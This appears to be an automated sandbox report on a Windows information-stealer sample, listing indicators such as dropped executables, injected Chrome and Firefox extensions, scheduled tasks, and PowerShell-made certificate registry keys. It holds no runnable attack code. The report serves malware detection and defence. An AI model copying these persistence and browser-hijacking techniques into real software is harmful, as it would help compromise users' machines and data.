Malware Analysis Report

2024-11-30 02:49

Sample ID 240407-wlhxfsag47
Target 75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f
SHA256 75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f
Tags
discovery spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f

Threat Level: Likely malicious

The file 75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f was found to be: Likely malicious.

Malicious Activity Summary

discovery spyware stealer

Blocklisted process makes network request

Checks BIOS information in registry

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Drops desktop.ini file(s)

Checks installed software on the system

Drops Chrome extension

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-07 18:00

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-07 18:00

Reported

2024-04-07 18:03

Platform

win10v2004-20240226-en

Max time kernel

126s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\AUIHvKh.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Program Files (x86)\YrliKKkuhgWU2\bdedluftlGzRk.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\ZEsyLeB.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\ddutGR.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\yMucUOn.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\CAwHQVp.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Program Files (x86)\YrliKKkuhgWU2\Sxxhlmi.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\vwnNFpw.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Program Files (x86)\IgAQuzzvNCUn\msmreRo.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bEcIFlOHxifjjBuFoU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\aUYdFpynDtMaquqaO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\yozVwwMRZiDXbVH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\YGcJOiVocZfwUgdee.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fb412698-0000-0000-0000-d01200000000} C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe N/A
